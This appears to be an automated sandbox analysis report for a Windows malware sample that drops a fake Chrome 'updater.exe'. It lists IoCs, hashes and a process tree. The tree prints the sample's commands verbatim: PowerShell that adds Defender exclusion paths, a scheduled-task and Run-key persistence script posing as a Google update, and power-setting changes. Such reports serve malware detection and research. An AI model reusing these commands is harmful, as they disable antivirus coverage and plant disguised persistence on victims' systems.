f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63

Resubmissions

16/09/2022, 23:56

220916-3y8f7scgdl 8

16/09/2022, 22:26

220916-2cxl5scfbl 8

Analysis

max time kernel
54s
max time network
183s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
16/09/2022, 22:26

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
Size

2.0MB
MD5

49feabd5f539ab1c2ecf22298ad7aa3c
SHA1

28fead69d9d6c8b651b51925f20ebb592f99d488
SHA256

f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63
SHA512

62a8e5d282ac7b080dd520c928800f3655b409c5231a11280744a16ff1a9f10d38723a25914051c1ea0cedd10780923ad60b50982e5775115497c8475dc3d901
SSDEEP

49152:yKLFXgaUnuVC6jBmo2a7RY302cQHyD55:yotSuXBmo2a7Wi6yD5

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2256	updater.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2256 set thread context of 4540	2256	updater.exe	92

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2768	powershell.exe
2768	powershell.exe
2768	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
4796	powershell.exe
4796	powershell.exe
4796	powershell.exe
3892	powershell.exe
3892	powershell.exe
3892	powershell.exe
3300	powershell.exe
3300	powershell.exe
3300	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeIncreaseQuotaPrivilege	2768	powershell.exe
Token: SeSecurityPrivilege	2768	powershell.exe
Token: SeTakeOwnershipPrivilege	2768	powershell.exe
Token: SeLoadDriverPrivilege	2768	powershell.exe
Token: SeSystemProfilePrivilege	2768	powershell.exe
Token: SeSystemtimePrivilege	2768	powershell.exe
Token: SeProfSingleProcessPrivilege	2768	powershell.exe
Token: SeIncBasePriorityPrivilege	2768	powershell.exe
Token: SeCreatePagefilePrivilege	2768	powershell.exe
Token: SeBackupPrivilege	2768	powershell.exe
Token: SeRestorePrivilege	2768	powershell.exe
Token: SeShutdownPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeSystemEnvironmentPrivilege	2768	powershell.exe
Token: SeRemoteShutdownPrivilege	2768	powershell.exe
Token: SeUndockPrivilege	2768	powershell.exe
Token: SeManageVolumePrivilege	2768	powershell.exe
Token: 33	2768	powershell.exe
Token: 34	2768	powershell.exe
Token: 35	2768	powershell.exe
Token: 36	2768	powershell.exe
Token: SeShutdownPrivilege	4268	powercfg.exe
Token: SeCreatePagefilePrivilege	4268	powercfg.exe
Token: SeShutdownPrivilege	1992	powercfg.exe
Token: SeCreatePagefilePrivilege	1992	powercfg.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeShutdownPrivilege	5064	powercfg.exe
Token: SeCreatePagefilePrivilege	5064	powercfg.exe
Token: SeShutdownPrivilege	4052	powercfg.exe
Token: SeCreatePagefilePrivilege	4052	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4848	powershell.exe
Token: SeSecurityPrivilege	4848	powershell.exe
Token: SeTakeOwnershipPrivilege	4848	powershell.exe
Token: SeLoadDriverPrivilege	4848	powershell.exe
Token: SeSystemProfilePrivilege	4848	powershell.exe
Token: SeSystemtimePrivilege	4848	powershell.exe
Token: SeProfSingleProcessPrivilege	4848	powershell.exe
Token: SeIncBasePriorityPrivilege	4848	powershell.exe
Token: SeCreatePagefilePrivilege	4848	powershell.exe
Token: SeBackupPrivilege	4848	powershell.exe
Token: SeRestorePrivilege	4848	powershell.exe
Token: SeShutdownPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeSystemEnvironmentPrivilege	4848	powershell.exe
Token: SeRemoteShutdownPrivilege	4848	powershell.exe
Token: SeUndockPrivilege	4848	powershell.exe
Token: SeManageVolumePrivilege	4848	powershell.exe
Token: 33	4848	powershell.exe
Token: 34	4848	powershell.exe
Token: 35	4848	powershell.exe
Token: 36	4848	powershell.exe
Token: SeIncreaseQuotaPrivilege	4848	powershell.exe
Token: SeSecurityPrivilege	4848	powershell.exe
Token: SeTakeOwnershipPrivilege	4848	powershell.exe
Token: SeLoadDriverPrivilege	4848	powershell.exe
Token: SeSystemProfilePrivilege	4848	powershell.exe
Token: SeSystemtimePrivilege	4848	powershell.exe
Token: SeProfSingleProcessPrivilege	4848	powershell.exe
Token: SeIncBasePriorityPrivilege	4848	powershell.exe
Token: SeCreatePagefilePrivilege	4848	powershell.exe
Token: SeBackupPrivilege	4848	powershell.exe
Token: SeRestorePrivilege	4848	powershell.exe
Token: SeShutdownPrivilege	4848	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 2700 wrote to memory of 2768	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	66
PID 2700 wrote to memory of 2768	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	66
PID 2700 wrote to memory of 4840	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	76
PID 2700 wrote to memory of 4840	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	76
PID 2700 wrote to memory of 4848	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	75
PID 2700 wrote to memory of 4848	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	75
PID 4840 wrote to memory of 4268	4840	cmd.exe	72
PID 4840 wrote to memory of 4268	4840	cmd.exe	72
PID 4840 wrote to memory of 1992	4840	cmd.exe	71
PID 4840 wrote to memory of 1992	4840	cmd.exe	71
PID 4840 wrote to memory of 5064	4840	cmd.exe	69
PID 4840 wrote to memory of 5064	4840	cmd.exe	69
PID 4840 wrote to memory of 4052	4840	cmd.exe	70
PID 4840 wrote to memory of 4052	4840	cmd.exe	70
PID 2700 wrote to memory of 4796	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	78
PID 2700 wrote to memory of 4796	2700	f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe	78
PID 4796 wrote to memory of 4784	4796	powershell.exe	81
PID 4796 wrote to memory of 4784	4796	powershell.exe	81
PID 2256 wrote to memory of 3892	2256	updater.exe	82
PID 2256 wrote to memory of 3892	2256	updater.exe	82
PID 2256 wrote to memory of 308	2256	updater.exe	84
PID 2256 wrote to memory of 308	2256	updater.exe	84
PID 2256 wrote to memory of 3300	2256	updater.exe	85
PID 2256 wrote to memory of 3300	2256	updater.exe	85
PID 308 wrote to memory of 2332	308	cmd.exe	88
PID 308 wrote to memory of 2332	308	cmd.exe	88
PID 308 wrote to memory of 772	308	cmd.exe	89
PID 308 wrote to memory of 772	308	cmd.exe	89
PID 308 wrote to memory of 2676	308	cmd.exe	90
PID 308 wrote to memory of 2676	308	cmd.exe	90
PID 308 wrote to memory of 2680	308	cmd.exe	91
PID 308 wrote to memory of 2680	308	cmd.exe	91
PID 2256 wrote to memory of 4540	2256	updater.exe	92
PID 2256 wrote to memory of 4540	2256	updater.exe	92
PID 2256 wrote to memory of 4540	2256	updater.exe	92
PID 2256 wrote to memory of 4292	2256	updater.exe	93
PID 2256 wrote to memory of 4292	2256	updater.exe	93
PID 4540 wrote to memory of 5072	4540	conhost.exe	94
PID 4540 wrote to memory of 5072	4540	conhost.exe	94
PID 5072 wrote to memory of 4632	5072	cmd.exe	97
PID 5072 wrote to memory of 4632	5072	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
"C:\Users\Admin\AppData\Local\Temp\f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#ubrrq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#nutydrrnl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4796
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:4784

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3892
- C:\Windows\system32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:308
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2332
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:772
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2676
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#ubrrq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3300
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe qwsdbbjaa
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4540
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Name, VideoProcessor
      4⤵
      Modifies data under HKEY_USERS
      PID:4632
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4292

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
2.0MB

MD5
c269a7457307ed26981eb994f340bbb8

SHA1
03770bb52018fad3f9a0e7475be6392911d65edf

SHA256
7862f14bac237a6e728eb45d741056a614ac0d1e4bf307c6263b37d2f35b9ddc

SHA512
0284fa7889fa4e5f587235a9bde51065442da38a4495c196501cde7cb908951cce783f23010b4603d76d64f672b2afb3b09c52ab1d8c2100514dc6728cd35421

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
2.0MB

MD5
c269a7457307ed26981eb994f340bbb8

SHA1
03770bb52018fad3f9a0e7475be6392911d65edf

SHA256
7862f14bac237a6e728eb45d741056a614ac0d1e4bf307c6263b37d2f35b9ddc

SHA512
0284fa7889fa4e5f587235a9bde51065442da38a4495c196501cde7cb908951cce783f23010b4603d76d64f672b2afb3b09c52ab1d8c2100514dc6728cd35421

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9fceaa8f38c649b2e22774fae18c3a57

SHA1
5fd53df1613ba5450c0b8efd46825db0d9b524e3

SHA256
fd1439be9ac2c7e9657901542c04521cea486ac10ba40144cfd20183b18e51c5

SHA512
45846475ef49c7fe0b7ccca1c18404f963f689c73ff4bd29add0fc49ce3872bceb230d5a45782731c4161888d853671253231c23e13b05b0739a4b835ff0c52a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d065ba56b0131fd0eeaa2ca6c1a5c30

SHA1
61c43c376097962c3257c91475e159002d9a4d78

SHA256
fb3a24224b370355fb3bedf1a95ee761450b00d93aa7861cfc37c512dbe3bf04

SHA512
c7a095590bbd4a11b10aa9955dfe2207a06b9a7569e3492257f8657f373a05d98792cc735056868faa7df0bf9f3c662d3e33e608e4851813cbf247d15ceb8cd0

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
memory/2768-120-0x000001727E540000-0x000001727E562000-memory.dmp

Filesize
136KB

Download
memory/2768-123-0x000001727E900000-0x000001727E976000-memory.dmp

Filesize
472KB

Download
memory/3300-585-0x000002C42C2F0000-0x000002C42C30C000-memory.dmp

Filesize
112KB

Download
memory/3300-616-0x000002C413BB9000-0x000002C413BBF000-memory.dmp

Filesize
24KB

Download
memory/3892-261-0x000001ED35D00000-0x000001ED35D0A000-memory.dmp

Filesize
40KB

Download
memory/3892-228-0x000001ED363C0000-0x000001ED36479000-memory.dmp

Filesize
740KB

Download
memory/3892-222-0x000001ED35D10000-0x000001ED35D2C000-memory.dmp

Filesize
112KB

Download